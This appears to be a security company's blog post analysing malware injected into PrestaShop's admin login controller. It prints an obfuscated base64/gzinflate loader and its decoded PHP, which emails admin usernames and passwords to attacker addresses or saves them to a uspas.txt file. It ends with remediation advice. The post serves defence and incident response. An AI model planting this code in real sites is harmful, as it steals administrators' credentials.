Attackers compromise sites with a number of goals in mind – also referred to as actions on objective. In some instances they aim to abuse resources or gain SEO power, and in others they are seeking access to sensitive data, also known as data exfiltration.
The Rise in Cyber Stealing
Lately we’ve noticed an increase in attempts to steal login credentials. We’ve seen many attacks targeting ecommerce websites with the intention of accessing sensitive information, including credit card numbers and back-end credentials. In an earlier post, we described a technique in which hackers injected code that resulted in the victim’s credentials being sent to the attacker’s email address.
This post uncovers another technique being used against PrestaShop sites. As we saw in the previous case, attackers manipulated the ./controllers/admin/AdminLoginController.php file.
Options for Attackers
This time, however, they injected a different piece of malicious code:
eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz
<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));
Here is the decoded version:
<?php if(function_exists("mail")){ $listo = array( 'eNyong' => 'a<removed>@<removed>mail.com', 'Dowoh' => 'm<removed>l@<removed>mail.com'); foreach($listo as $ming => $imel){ mail($imel,'Setoran Admin '.$_SERVER['HTTP_HOST'].' ^_^', "Kye Pak $ming,\n\nNama: ".$employee->firstname." ".$employee->lastname. "\nEmail: $email\nPassword: $passwd"); } } else{$f=fopen('uspas.txt','a');fwrite($f,"imel:$email | pass: $passwd\n");fclose($f);} ?>
To gain access to the credentials, the attackers used an interesting conditional statement. First, they checked if the server had the mailing capabilities necessary to send all the sensitive data to a specific email address. If the server did not have that capability, the code would simply write a file called uspas.txt into the system, which contains the username and password.
Based on this outcome, attackers could choose between checking their email or accessing the .txt file on the victim’s website.
Protect Your Site
In case of a compromise, it is good practice to act as if all user accounts and personal information were stolen. We recommend changing all passwords from the back-end, cPanel, SFTP and other connection mechanisms that could give attackers any leverage.
Undergoing an attack like this can severely damage a business’s reputation. Keeping good security practices, such as file integrity monitoring, and using a Web Application Firewall will reduce the risk of infection. If your ecommerce site has been compromised, please reach out to us and our Incident Response Team will handle your case directly.